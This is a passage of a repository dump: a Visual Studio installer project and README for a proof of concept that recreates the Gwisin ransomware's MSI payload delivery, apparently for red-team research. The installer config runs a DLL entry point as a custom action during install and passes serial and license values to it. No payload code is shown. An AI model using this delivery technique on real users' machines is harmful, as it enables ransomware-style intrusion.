5 | "IsWebType" = "8:FALSE"
6 | "ProjectName" = "8:GwisinMsi"
7 | "LanguageId" = "3:1033"
8 | "CodePage" = "3:1252"
9 | "UILanguageId" = "3:1033"
10 | "SccProjectName" = "8:"
11 | "SccLocalPath" = "8:"
12 | "SccAuxPath" = "8:"
13 | "SccProvider" = "8:"
14 | "Hierarchy"
15 | {
16 | "Entry"
17 | {
18 | "MsmKey" = "8:_D42A3724FA684F68BB55690DB47300B8"
19 | "OwnerKey" = "8:_UNDEFINED"
20 | "MsmSig" = "8:_UNDEFINED"
21 | }
22 | }
23 | "Configurations"
24 | {
25 | "Debug"
26 | {
27 | "DisplayName" = "8:Debug"
28 | "IsDebugOnly" = "11:TRUE"
29 | "IsReleaseOnly" = "11:FALSE"
30 | "OutputFilename" = "8:Debug\\GwisinMsi.msi"
31 | "PackageFilesAs" = "3:2"
32 | "PackageFileSize" = "3:-2147483648"
33 | "CabType" = "3:1"
34 | "Compression" = "3:2"
35 | "SignOutput" = "11:FALSE"
36 | "CertificateFile" = "8:"
37 | "PrivateKeyFile" = "8:"
38 | "TimeStampServer" = "8:"
39 | "InstallerBootstrapper" = "3:2"
40 | }
41 | "Release"
42 | {
43 | "DisplayName" = "8:Release"
44 | "IsDebugOnly" = "11:FALSE"
45 | "IsReleaseOnly" = "11:TRUE"
46 | "OutputFilename" = "8:Release\\GwisinMsi.msi"
47 | "PackageFilesAs" = "3:2"
48 | "PackageFileSize" = "3:-2147483648"
49 | "CabType" = "3:1"
50 | "Compression" = "3:2"
51 | "SignOutput" = "11:FALSE"
52 | "CertificateFile" = "8:"
53 | "PrivateKeyFile" = "8:"
54 | "TimeStampServer" = "8:"
55 | "InstallerBootstrapper" = "3:2"
56 | }
57 | }
58 | "Deployable"
59 | {
60 | "CustomAction"
61 | {
62 | "{4AA51A2D-7D85-4A59-BA75-B0809FC8B380}:_5327BE0E34934EC283AB13E215E8EEBE"
63 | {
64 | "Name" = "8:GwisinDll.dll"
65 | "Condition" = "8:"
66 | "Object" = "8:_D42A3724FA684F68BB55690DB47300B8"
67 | "FileType" = "3:1"
68 | "InstallAction" = "3:1"
69 | "Arguments" = "8:"
70 | "EntryPoint" = "8:GwisinCustom"
71 | "Sequence" = "3:1"
72 | "Identifier" = "8:_88F4EDE8_92E4_40F7_86F0_C4BA835A83E8"
73 | "InstallerClass" = "11:FALSE"
74 | "CustomActionData" = "8:SERIAL=[SERIAL] LICENS=[LICENSE]"
75 | "Run64Bit" = "11:TRUE"
76 | }
77 | }
78 | "DefaultFeature"
79 | {
80 | "Name" = "8:DefaultFeature"
81 | "Title" = "8:"
82 | "Description" = "8:"
83 | }
84 | "ExternalPersistence"
85 | {
86 | "LaunchCondition"
87 | {
88 | }
89 | }
90 | "File"
91 | {
92 | "{1FB2D0AE-D3B9-43D4-B9DD-F88EC61E35DE}:_D42A3724FA684F68BB55690DB47300B8"
93 | {
94 | "SourcePath" = "8:GwisinDll\\x64\\Release\\GwisinDll.dll"
95 | "TargetName" = "8:GwisinDll.dll"
96 | "Tag" = "8:"
97 | "Folder" = "8:_28CF9ABB76E0491B9A9A60632953A7FD"
98 | "Condition" = "8:"
99 | "Transitive" = "11:FALSE"
100 | "Vital" = "11:TRUE"
101 | "ReadOnly" = "11:FALSE"
102 | "Hidden" = "11:FALSE"
103 | "System" = "11:FALSE"
104 | "Permanent" = "11:FALSE"
105 | "SharedLegacy" = "11:FALSE"
106 | "PackageAs" = "3:1"
107 | "Register" = "3:1"
108 | "Exclude" = "11:FALSE"
109 | "IsDependency" = "11:FALSE"
110 | "IsolateTo" = "8:"
111 | }
112 | }
113 | "FileType"
114 | {
115 | }
116 | "Folder"
117 | {
118 | "{1525181F-901A-416C-8A58-119130FE478E}:_28CF9ABB76E0491B9A9A60632953A7FD"
119 | {
120 | "Name" = "8:#1915"
121 | "AlwaysCreate" = "11:FALSE"
122 | "Condition" = "8:"
123 | "Transitive" = "11:FALSE"
124 | "Property" = "8:AppDataFolder"
125 | "Folders"
126 | {
127 | }
128 | }
129 | "{1525181F-901A-416C-8A58-119130FE478E}:_4FF6F8BCDB0A4CB69C4788DD3E963724"
130 | {
131 | "Name" = "8:#1916"
132 | "AlwaysCreate" = "11:FALSE"
133 | "Condition" = "8:"
134 | "Transitive" = "11:FALSE"
135 | "Property" = "8:DesktopFolder"
136 | "Folders"
137 | {
138 | }
139 | }
140 | "{3C67513D-01DD-4637-8A68-80971EB9504F}:_B9648CCC22184A06A0C38C82B47CF217"
141 | {
142 | "DefaultLocation" = "8:[ProgramFiles64Folder][Manufacturer]\\[ProductName]"
143 | "Name" = "8:#1925"
144 | "AlwaysCreate" = "11:FALSE"
145 | "Condition" = "8:"
146 | "Transitive" = "11:FALSE"
147 | "Property" = "8:TARGETDIR"
148 | "Folders"
149 | {
150 | }
151 | }
152 | "{1525181F-901A-416C-8A58-119130FE478E}:_DF098EDCEDB341B397B7BDFC59764278"
153 | {
154 | "Name" = "8:#1919"
155 | "AlwaysCreate" = "11:FALSE"
156 | "Condition" = "8:"
157 | "Transitive" = "11:FALSE"
158 | "Property" = "8:ProgramMenuFolder"
159 | "Folders"
160 | {
161 | }
162 | }
163 | }
164 | "LaunchCondition"
165 | {
166 | }
167 | "Locator"
168 | {
169 | }
170 | "MsiBootstrapper"
171 | {
172 | "LangId" = "3:1033"
173 | "RequiresElevation" = "11:FALSE"
174 | }
175 | "Product"
176 | {
177 | "Name" = "8:Microsoft Visual Studio"
178 | "ProductName" = "8:GwisinMsi"
179 | "ProductCode" = "8:{7560697C-E18E-4E30-8EEC-1C2E5953C4E3}"
180 | "PackageCode" = "8:{9B40BDB7-E209-407F-BB08-BC30EEF0B673}"
181 | "UpgradeCode" = "8:{18E0FDEB-5E51-4B04-A94E-DB2D21AF27C6}"
182 | "AspNetVersion" = "8:2.0.50727.0"
183 | "RestartWWWService" = "11:FALSE"
184 | "RemovePreviousVersions" = "11:FALSE"
185 | "DetectNewerInstalledVersion" = "11:TRUE"
186 | "InstallAllUsers" = "11:FALSE"
187 | "ProductVersion" = "8:1.0.0"
188 | "Manufacturer" = "8:choi"
189 | "ARPHELPTELEPHONE" = "8:"
190 | "ARPHELPLINK" = "8:"
191 | "Title" = "8:GwisinMsi"
192 | "Subject" = "8:"
193 | "ARPCONTACT" = "8:Gwisin PoC"
194 | "Keywords" = "8:"
195 | "ARPCOMMENTS" = "8:"
196 | "ARPURLINFOABOUT" = "8:"
197 | "ARPPRODUCTICON" = "8:"
198 | "ARPIconIndex" = "3:0"
199 | "SearchPath" = "8:"
200 | "UseSystemSearchPath" = "11:TRUE"
201 | "TargetPlatform" = "3:1"
202 | "PreBuildEvent" = "8:"
203 | "PostBuildEvent" = "8:"
204 | "RunPostBuildEvent" = "3:0"
205 | }
206 | "Registry"
207 | {
208 | "HKLM"
209 | {
210 | "Keys"
211 | {
212 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_CD50586F52FD4FBEA6276102D02ADCD4"
213 | {
214 | "Name" = "8:Software"
215 | "Condition" = "8:"
216 | "AlwaysCreate" = "11:FALSE"
217 | "DeleteAtUninstall" = "11:FALSE"
218 | "Transitive" = "11:FALSE"
219 | "Keys"
220 | {
221 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_4395FD3AFDD5407BB92182378F768CC1"
222 | {
223 | "Name" = "8:[Manufacturer]"
224 | "Condition" = "8:"
225 | "AlwaysCreate" = "11:FALSE"
226 | "DeleteAtUninstall" = "11:FALSE"
227 | "Transitive" = "11:FALSE"
228 | "Keys"
229 | {
230 | }
231 | "Values"
232 | {
233 | }
234 | }
235 | }
236 | "Values"
237 | {
238 | }
239 | }
240 | }
241 | }
242 | "HKCU"
243 | {
244 | "Keys"
245 | {
246 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_B7B11BD73CEE4D9CB5C54F4216C55FAD"
247 | {
248 | "Name" = "8:Software"
249 | "Condition" = "8:"
250 | "AlwaysCreate" = "11:FALSE"
251 | "DeleteAtUninstall" = "11:FALSE"
252 | "Transitive" = "11:FALSE"
253 | "Keys"
254 | {
255 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_F84978AADE5D421C83B6907AC3F788F9"
256 | {
257 | "Name" = "8:[Manufacturer]"
258 | "Condition" = "8:"
259 | "AlwaysCreate" = "11:FALSE"
260 | "DeleteAtUninstall" = "11:FALSE"
261 | "Transitive" = "11:FALSE"
262 | "Keys"
263 | {
264 | }
265 | "Values"
266 | {
267 | }
268 | }
269 | }
270 | "Values"
271 | {
272 | }
273 | }
274 | }
275 | }
276 | "HKCR"
277 | {
278 | "Keys"
279 | {
280 | }
281 | }
282 | "HKU"
283 | {
284 | "Keys"
285 | {
286 | }
287 | }
288 | "HKPU"
289 | {
290 | "Keys"
291 | {
292 | }
293 | }
294 | }
295 | "Sequences"
296 | {
297 | }
298 | "Shortcut"
299 | {
300 | }
301 | "UserInterface"
302 | {
303 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_079E9C42ADE44922A761CD1294A3485F"
304 | {
305 | "Name" = "8:#1900"
306 | "Sequence" = "3:2"
307 | "Attributes" = "3:1"
308 | "Dialogs"
309 | {
310 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_25CDBE08A4C34BC8BC4B052C5904C05D"
311 | {
312 | "Sequence" = "3:100"
313 | "DisplayName" = "8:Welcome"
314 | "UseDynamicProperties" = "11:TRUE"
315 | "IsDependency" = "11:FALSE"
316 | "SourcePath" = "8:\\VsdAdminWelcomeDlg.wid"
317 | "Properties"
318 | {
319 | "BannerBitmap"
320 | {
321 | "Name" = "8:BannerBitmap"
322 | "DisplayName" = "8:#1001"
323 | "Description" = "8:#1101"
324 | "Type" = "3:8"
325 | "ContextData" = "8:Bitmap"
326 | "Attributes" = "3:4"
327 | "Setting" = "3:1"
328 | "UsePlugInResources" = "11:TRUE"
329 | }
330 | "CopyrightWarning"
331 | {
332 | "Name" = "8:CopyrightWarning"
333 | "DisplayName" = "8:#1002"
334 | "Description" = "8:#1102"
335 | "Type" = "3:3"
336 | "ContextData" = "8:"
337 | "Attributes" = "3:0"
338 | "Setting" = "3:1"
339 | "Value" = "8:#1202"
340 | "DefaultValue" = "8:#1202"
341 | "UsePlugInResources" = "11:TRUE"
342 | }
343 | "Welcome"
344 | {
345 | "Name" = "8:Welcome"
346 | "DisplayName" = "8:#1003"
347 | "Description" = "8:#1103"
348 | "Type" = "3:3"
349 | "ContextData" = "8:"
350 | "Attributes" = "3:0"
351 | "Setting" = "3:1"
352 | "Value" = "8:#1203"
353 | "DefaultValue" = "8:#1203"
354 | "UsePlugInResources" = "11:TRUE"
355 | }
356 | }
357 | }
358 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_493F98A2C9A3487F8D6F960C75038BFA"
359 | {
360 | "Sequence" = "3:200"
361 | "DisplayName" = "8:Installation Folder"
362 | "UseDynamicProperties" = "11:TRUE"
363 | "IsDependency" = "11:FALSE"
364 | "SourcePath" = "8:\\VsdAdminFolderDlg.wid"
365 | "Properties"
366 | {
367 | "BannerBitmap"
368 | {
369 | "Name" = "8:BannerBitmap"
370 | "DisplayName" = "8:#1001"
371 | "Description" = "8:#1101"
372 | "Type" = "3:8"
373 | "ContextData" = "8:Bitmap"
374 | "Attributes" = "3:4"
375 | "Setting" = "3:1"
376 | "UsePlugInResources" = "11:TRUE"
377 | }
378 | }
379 | }
380 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_568F2054D8724773BCE07CFC5A59E200"
381 | {
382 | "Sequence" = "3:300"
383 | "DisplayName" = "8:Confirm Installation"
384 | "UseDynamicProperties" = "11:TRUE"
385 | "IsDependency" = "11:FALSE"
386 | "SourcePath" = "8:\\VsdAdminConfirmDlg.wid"
387 | "Properties"
388 | {
389 | "BannerBitmap"
390 | {
391 | "Name" = "8:BannerBitmap"
392 | "DisplayName" = "8:#1001"
393 | "Description" = "8:#1101"
394 | "Type" = "3:8"
395 | "ContextData" = "8:Bitmap"
396 | "Attributes" = "3:4"
397 | "Setting" = "3:1"
398 | "UsePlugInResources" = "11:TRUE"
399 | }
400 | }
401 | }
402 | }
403 | }
404 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_141B27E2CB674B56B3CEA33D17005EEA"
405 | {
406 | "Name" = "8:#1902"
407 | "Sequence" = "3:1"
408 | "Attributes" = "3:3"
409 | "Dialogs"
410 | {
411 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_57E786504B5F42B7B6DBCADD39A2387F"
412 | {
413 | "Sequence" = "3:100"
414 | "DisplayName" = "8:Finished"
415 | "UseDynamicProperties" = "11:TRUE"
416 | "IsDependency" = "11:FALSE"
417 | "SourcePath" = "8:\\VsdFinishedDlg.wid"
418 | "Properties"
419 | {
420 | "BannerBitmap"
421 | {
422 | "Name" = "8:BannerBitmap"
423 | "DisplayName" = "8:#1001"
424 | "Description" = "8:#1101"
425 | "Type" = "3:8"
426 | "ContextData" = "8:Bitmap"
427 | "Attributes" = "3:4"
428 | "Setting" = "3:1"
429 | "UsePlugInResources" = "11:TRUE"
430 | }
431 | "UpdateText"
432 | {
433 | "Name" = "8:UpdateText"
434 | "DisplayName" = "8:#1058"
435 | "Description" = "8:#1158"
436 | "Type" = "3:15"
437 | "ContextData" = "8:"
438 | "Attributes" = "3:0"
439 | "Setting" = "3:1"
440 | "Value" = "8:#1258"
441 | "DefaultValue" = "8:#1258"
442 | "UsePlugInResources" = "11:TRUE"
443 | }
444 | }
445 | }
446 | }
447 | }
448 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_3A5D608A01824922835E908BC2AD0B4F"
449 | {
450 | "Name" = "8:#1900"
451 | "Sequence" = "3:1"
452 | "Attributes" = "3:1"
453 | "Dialogs"
454 | {
455 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_5903EBB087564A5E9A00F885A223EF3A"
456 | {
457 | "Sequence" = "3:300"
458 | "DisplayName" = "8:Confirm Installation"
459 | "UseDynamicProperties" = "11:TRUE"
460 | "IsDependency" = "11:FALSE"
461 | "SourcePath" = "8:\\VsdConfirmDlg.wid"
462 | "Properties"
463 | {
464 | "BannerBitmap"
465 | {
466 | "Name" = "8:BannerBitmap"
467 | "DisplayName" = "8:#1001"
468 | "Description" = "8:#1101"
469 | "Type" = "3:8"
470 | "ContextData" = "8:Bitmap"
471 | "Attributes" = "3:4"
472 | "Setting" = "3:1"
473 | "UsePlugInResources" = "11:TRUE"
474 | }
475 | }
476 | }
477 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_AB0FBC2DEEAE4D3DBDC89390FF14E943"
478 | {
479 | "Sequence" = "3:200"
480 | "DisplayName" = "8:Installation Folder"
481 | "UseDynamicProperties" = "11:TRUE"
482 | "IsDependency" = "11:FALSE"
483 | "SourcePath" = "8:\\VsdFolderDlg.wid"
484 | "Properties"
485 | {
486 | "BannerBitmap"
487 | {
488 | "Name" = "8:BannerBitmap"
489 | "DisplayName" = "8:#1001"
490 | "Description" = "8:#1101"
491 | "Type" = "3:8"
492 | "ContextData" = "8:Bitmap"
493 | "Attributes" = "3:4"
494 | "Setting" = "3:1"
495 | "UsePlugInResources" = "11:TRUE"
496 | }
497 | "InstallAllUsersVisible"
498 | {
499 | "Name" = "8:InstallAllUsersVisible"
500 | "DisplayName" = "8:#1059"
501 | "Description" = "8:#1159"
502 | "Type" = "3:5"
503 | "ContextData" = "8:1;True=1;False=0"
504 | "Attributes" = "3:0"
505 | "Setting" = "3:0"
506 | "Value" = "3:1"
507 | "DefaultValue" = "3:1"
508 | "UsePlugInResources" = "11:TRUE"
509 | }
510 | }
511 | }
512 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_D6C28C8A73AE4B499011B6E00E547B7C"
513 | {
514 | "Sequence" = "3:100"
515 | "DisplayName" = "8:Welcome"
516 | "UseDynamicProperties" = "11:TRUE"
517 | "IsDependency" = "11:FALSE"
518 | "SourcePath" = "8:\\VsdWelcomeDlg.wid"
519 | "Properties"
520 | {
521 | "BannerBitmap"
522 | {
523 | "Name" = "8:BannerBitmap"
524 | "DisplayName" = "8:#1001"
525 | "Description" = "8:#1101"
526 | "Type" = "3:8"
527 | "ContextData" = "8:Bitmap"
528 | "Attributes" = "3:4"
529 | "Setting" = "3:1"
530 | "UsePlugInResources" = "11:TRUE"
531 | }
532 | "CopyrightWarning"
533 | {
534 | "Name" = "8:CopyrightWarning"
535 | "DisplayName" = "8:#1002"
536 | "Description" = "8:#1102"
537 | "Type" = "3:3"
538 | "ContextData" = "8:"
539 | "Attributes" = "3:0"
540 | "Setting" = "3:1"
541 | "Value" = "8:#1202"
542 | "DefaultValue" = "8:#1202"
543 | "UsePlugInResources" = "11:TRUE"
544 | }
545 | "Welcome"
546 | {
547 | "Name" = "8:Welcome"
548 | "DisplayName" = "8:#1003"
549 | "Description" = "8:#1103"
550 | "Type" = "3:3"
551 | "ContextData" = "8:"
552 | "Attributes" = "3:0"
553 | "Setting" = "3:1"
554 | "Value" = "8:#1203"
555 | "DefaultValue" = "8:#1203"
556 | "UsePlugInResources" = "11:TRUE"
557 | }
558 | }
559 | }
560 | }
561 | }
562 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_61C76CE19D5C4C2D954A12B07ABFD505"
563 | {
564 | "Name" = "8:#1902"
565 | "Sequence" = "3:2"
566 | "Attributes" = "3:3"
567 | "Dialogs"
568 | {
569 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_24218A45345C471BA72EA6B3F939A486"
570 | {
571 | "Sequence" = "3:100"
572 | "DisplayName" = "8:Finished"
573 | "UseDynamicProperties" = "11:TRUE"
574 | "IsDependency" = "11:FALSE"
575 | "SourcePath" = "8:\\VsdAdminFinishedDlg.wid"
576 | "Properties"
577 | {
578 | "BannerBitmap"
579 | {
580 | "Name" = "8:BannerBitmap"
581 | "DisplayName" = "8:#1001"
582 | "Description" = "8:#1101"
583 | "Type" = "3:8"
584 | "ContextData" = "8:Bitmap"
585 | "Attributes" = "3:4"
586 | "Setting" = "3:1"
587 | "UsePlugInResources" = "11:TRUE"
588 | }
589 | }
590 | }
591 | }
592 | }
593 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_635DFFC9F2F3479090AC50FDB956E5ED"
594 | {
595 | "Name" = "8:#1901"
596 | "Sequence" = "3:1"
597 | "Attributes" = "3:2"
598 | "Dialogs"
599 | {
600 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_703D4AC7013149F9867208D2A7E7F382"
601 | {
602 | "Sequence" = "3:100"
603 | "DisplayName" = "8:Progress"
604 | "UseDynamicProperties" = "11:TRUE"
605 | "IsDependency" = "11:FALSE"
606 | "SourcePath" = "8:\\VsdProgressDlg.wid"
607 | "Properties"
608 | {
609 | "BannerBitmap"
610 | {
611 | "Name" = "8:BannerBitmap"
612 | "DisplayName" = "8:#1001"
613 | "Description" = "8:#1101"
614 | "Type" = "3:8"
615 | "ContextData" = "8:Bitmap"
616 | "Attributes" = "3:4"
617 | "Setting" = "3:1"
618 | "UsePlugInResources" = "11:TRUE"
619 | }
620 | "ShowProgress"
621 | {
622 | "Name" = "8:ShowProgress"
623 | "DisplayName" = "8:#1009"
624 | "Description" = "8:#1109"
625 | "Type" = "3:5"
626 | "ContextData" = "8:1;True=1;False=0"
627 | "Attributes" = "3:0"
628 | "Setting" = "3:0"
629 | "Value" = "3:1"
630 | "DefaultValue" = "3:1"
631 | "UsePlugInResources" = "11:TRUE"
632 | }
633 | }
634 | }
635 | }
636 | }
637 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_68B915AADB11462BB0883290732A473B"
638 | {
639 | "Name" = "8:#1901"
640 | "Sequence" = "3:2"
641 | "Attributes" = "3:2"
642 | "Dialogs"
643 | {
644 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_F2E2FA2CA3994E0EBB515B9E9E3E6319"
645 | {
646 | "Sequence" = "3:100"
647 | "DisplayName" = "8:Progress"
648 | "UseDynamicProperties" = "11:TRUE"
649 | "IsDependency" = "11:FALSE"
650 | "SourcePath" = "8:\\VsdAdminProgressDlg.wid"
651 | "Properties"
652 | {
653 | "BannerBitmap"
654 | {
655 | "Name" = "8:BannerBitmap"
656 | "DisplayName" = "8:#1001"
657 | "Description" = "8:#1101"
658 | "Type" = "3:8"
659 | "ContextData" = "8:Bitmap"
660 | "Attributes" = "3:4"
661 | "Setting" = "3:1"
662 | "UsePlugInResources" = "11:TRUE"
663 | }
664 | "ShowProgress"
665 | {
666 | "Name" = "8:ShowProgress"
667 | "DisplayName" = "8:#1009"
668 | "Description" = "8:#1109"
669 | "Type" = "3:5"
670 | "ContextData" = "8:1;True=1;False=0"
671 | "Attributes" = "3:0"
672 | "Setting" = "3:0"
673 | "Value" = "3:1"
674 | "DefaultValue" = "3:1"
675 | "UsePlugInResources" = "11:TRUE"
676 | }
677 | }
678 | }
679 | }
680 | }
681 | "{2479F3F5-0309-486D-8047-8187E2CE5BA0}:_7AA90E7A57F14D8988F8804A8796066C"
682 | {
683 | "UseDynamicProperties" = "11:FALSE"
684 | "IsDependency" = "11:FALSE"
685 | "SourcePath" = "8:\\VsdUserInterface.wim"
686 | }
687 | "{2479F3F5-0309-486D-8047-8187E2CE5BA0}:_88F0DFB6D0BA42DFB4FF876B414CFE95"
688 | {
689 | "UseDynamicProperties" = "11:FALSE"
690 | "IsDependency" = "11:FALSE"
691 | "SourcePath" = "8:\\VsdBasicDialogs.wim"
692 | }
693 | }
694 | "MergeModule"
695 | {
696 | }
697 | "ProjectOutput"
698 | {
699 | }
700 | }
701 | }
702 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GwisinMsi
2 |
3 | This repo contains the PoC of the MSI payload used in the [blog post](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/). The payload is based on the AhnLab ASEC team's analysis of the Gwisin ransomware's MSI payload, published in their [blog post](https://asec.ahnlab.com/en/37483/).
4 |
5 | ## DLL Compiling Configuration
6 | - Project > Project properties > C/C++ > Preprocessor > Preprocessor Definitions - `_CRT_SECURE_NO_WARNINGS`
7 | - Project > Project properties > Character Set > Multi-byte
8 |
9 | ## Credits and References
10 | - [HuskyHacks](https://huskyhacks.dev/) - MSI Payload [Blog Post](https://notes.huskyhacks.dev/notes/ms-interloper-on-the-subject-of-malicious-msis)
11 | - [ASEC AhnLab](https://asec.ahnlab.com/en/) - [blog post](https://asec.ahnlab.com/en/37483/)
12 | - [SK Shieldus](https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf)
13 | - [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md)
14 |
15 | ## Demo
16 | 
17 |
--------------------------------------------------------------------------------
/image/msi-demo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChoiSG/GwisinMsi/503e1c9da38d1fa070e9dd0d1df2c0e101e67867/image/msi-demo.gif
--------------------------------------------------------------------------------